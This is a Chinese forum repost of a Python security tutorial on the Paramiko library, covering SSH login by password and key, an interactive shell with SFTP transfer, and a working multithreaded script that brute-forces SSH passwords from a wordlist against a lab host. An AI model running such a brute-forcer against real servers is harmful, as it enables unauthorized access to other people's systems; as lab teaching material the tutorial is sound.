水军大提督 发表于 2025-1-2 18:59:24

python安全脚本开辟四:ssh爆破

【原理】:
        ssh是一个协议,OpenSSH是其中的一个开源实现,Paramiko是Python的一个库,实现了SSHv2协议。
        有了Paramiko以后,就可以在Python代码中直接使用SSH协议对远程服务器实行操纵,而不是通过ssh命令对服务器进行操纵。
        paramiko包含两个核心组件:SSHClient和SFTPClient
        SSHClient的作用类似于Linux的ssh命令,是对SSH会话的封装,该类封装了传输(Transport),通道(Channel)及SFTPClient创建的方法(open_sftp),通常用于实行远程命令。
        SFTPClient的作用类似于Linux的sftp命令,是对SFTP客户端的封装,用以实现远程文件操纵,如文件上传、下载、修改文件权限等操纵。
        Paramiko中的几个根本名词:
        1、Channel:是一种类Socket,一种安全的SSH传输通道;
        2、Transport:是一种加密的会话,使用时会同步创建了一个加密的Tunnels(通道),这个Tunnels叫做Channel;
        3、Session:是client与Server保持毗连的对象,用connect()/start_client()/start_server()开始会话。

基于用户名和暗码的SSHClient方式的登录

这个代码的缺点是一次只能实行一个命令操纵
import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ssh.connect(hostname='192.168.145.140',port=22,username='kali',password='kali')

stdin, stdout, stderr = ssh.exec_command('ls -al')
print(stdout.read().decode())

ssh.close()   

[*]stdin:这个变量是一个文件对象,你可以通过它向远程命令提供输入(对于没有输入的命令,它通常是空的)。
[*]stdout:这个变量是一个文件对象,你可以从中读取命令的标准输出(即命令实行结果)。
[*]stderr:这个变量也是一个文件对象,用于读取命令的标准错误输出(即错误信息)。

为了可以与目标主机保持交互我们
import paramiko
import time

# 创建 SSH 客户端并设置自动添加未知主机密钥策略
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# 连接到远程服务器
ssh.connect(hostname='192.168.145.140', port=22, username='kali', password='kali')

# 创建交互式 shell 会话
shell = ssh.invoke_shell()
sftp = ssh.open_sftp()

while True:
    x = input("Linux:")
    if x.startswith('#exit'):
      break
    elif x.startswith('#upload'):
      try:
            local_path = input("本地文件路径:")
            remote_path = input("上传文件路径:")
            sftp.put(local_path, remote_path)
            print(f"Upload {local_path} to {remote_path}")
      except Exception as e:
            print("Uplaod Failed",e)
    elif x.startswith('#download'):
      try:
            remote_path = input("下载文件路径:")
            local_path = input("本地文件路径:")
            sftp.get(remote_path, local_path)
            print(f"Download {remote_path} to {local_path}")
      except Exception as e:
            print("Download Failed",e)
    else:
      shell.send(x + '\n')# 发送第一个命令
      time.sleep(1)# 等待命令执行完毕
      output = shell.recv(4096).decode()# 接收命令输出
      print("Command Output:", output)


sftp.close()
ssh.close()
 通过
   shell = ssh.invoke_shell()
sftp = ssh.open_sftp()
 创建交互式shell,通过sftp实现文件的上传下载

基于用户名和暗码的Transport方式登录

import paramiko

# 实例化一个 Transport 对象
trans = paramiko.Transport(('192.168.12.142', 22))

# 建立连接
trans.connect(username='root', password='com.1234')

# 将 SSHClient 的对象的 transport 指定为以上的 trans
ssh = paramiko.SSHClient()
ssh._transport = trans

# 执行命令,和传统方法一样
stdin, stdout, stderr = ssh.exec_command('df -hl')
print(stdout.read().decode())

# 关闭连接
trans.close()
https://i-blog.csdnimg.cn/direct/4f143e8ea8ea4d17b207736ecc0f897d.png


基于密钥的SSHClinet方式登录

        密钥形式登录的原理是:利用密钥天生器的制作一对密钥——一只公钥一只私钥。将公钥添加到服务器的某个账户上,然后在客户端利用私钥即可完成认证并登录。这样一来,没有私钥,任何人都无法通过SSH暴力破解到暗码来远程登陆体系。此外,如果将公钥复制到其他账户甚至主机,利用私钥也可以登录
1.制作密钥对
        起首在服务器上天生密钥对
   ssh-keygen
        接着在服务器上安装公钥
   cat id_rsa.pub >>/root/.ssh/authorized_keys              //id_rsa.pub是天生密钥对时输入的名称
 如此便完成公钥的安装。为保证毗连成功,要确保文件权限的准确
   ┌──(root㉿kali)-
└─# chmod 600 /root/.ssh/authorized_keys        
                                                                                               
┌──(root㉿kali)-
└─# chmod 700 /root/.ssh   

import paramiko

# 指定本地的 RSA 私钥文件。如果建立密钥对时设置了密码,需指定 password 参数。
pkey = paramiko.RSAKey.from_private_key_file('/root/id_rsa')

# 建立连接
trans = paramiko.Transport(('192.168.12.142', 22))
trans.connect(username='root', pkey=pkey)

# 将 SSHClient 的对象的 transport 指定为以上的 trans
ssh = paramiko.SSHClient()
ssh._transport = trans

# 执行命令,和传统方法一样
stdin, stdout, stderr = ssh.exec_command('df -hl')
print(stdout.read().decode())

# 关闭连接
trans.close()
SSH爆破脚本编写

import paramiko
import sys
import threading
from concurrent.futures import ThreadPoolExecutor

is_find = False

def CheckSSH(passwd):
    try:
      ssh = paramiko.SSHClient()
      ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
      ssh.connect(hostname='192.168.145.140',port=22,username = 'kali',password=passwd,timeout=5)
      stdin, stdout, stderr = ssh.exec_command('df')
      result = stdout.read()
      if result:
            sys.stdout.write('' + '\t' + passwd + '\n')
            global is_find
            is_find = True
            exit(0)
    except Exception as e:
      print(e,"失败!!!")
    finally:
      ssh.close()

filedata = open(r'C:\\Users\Limusi\Desktop\emmm\password.txt',"r")
def run():
    pool = ThreadPoolExecutor(1)
    while True:
      global is_find
      if is_find:
            break
      line = filedata.readline()
      if not line:
            break
      line = line.strip('\n')
      pool.submit(CheckSSH, line)
run()

https://i-blog.csdnimg.cn/direct/1d6509f520a5448c8e30844e1d785ab1.png
如果字典足够大可以爆破出暗码,但是这样的简易代码也存在着许多的限定,可能会因为防火墙拦截大概是服务器判定暴力攻击而主动断开毗连,

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: python安全脚本开辟四:ssh爆破